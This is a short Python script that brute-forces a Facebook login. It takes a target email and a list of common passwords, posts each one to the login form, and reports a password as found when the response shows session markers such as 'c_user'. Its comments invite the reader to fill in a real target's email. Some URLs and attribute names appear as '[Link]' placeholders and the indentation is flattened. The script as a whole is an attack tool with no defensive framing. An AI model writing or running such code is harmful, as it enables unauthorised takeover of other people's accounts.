import requests
def brute_force_facebook(email, password_list):
login_url = "[Link]
headers = {
"User-Agent": "Mozilla/5.0"
}
for password in password_list:
response = [Link](login_url, data={
"email": email,
"pass": password
}, headers=headers)
if "home_icon" in [Link] or "c_user" in [Link]:
print(f"[+] Password found: {password}")
return password
else:
print(f"[-] Password failed: {password}")
print("[!] Password not found in list")
return None
# Replace with the target email and a list of possible passwords
email = "target_email@[Link]"
password_list = ["123456", "password", "letmein", "qwerty", "abc123"]
brute_force_facebook(email, password_list)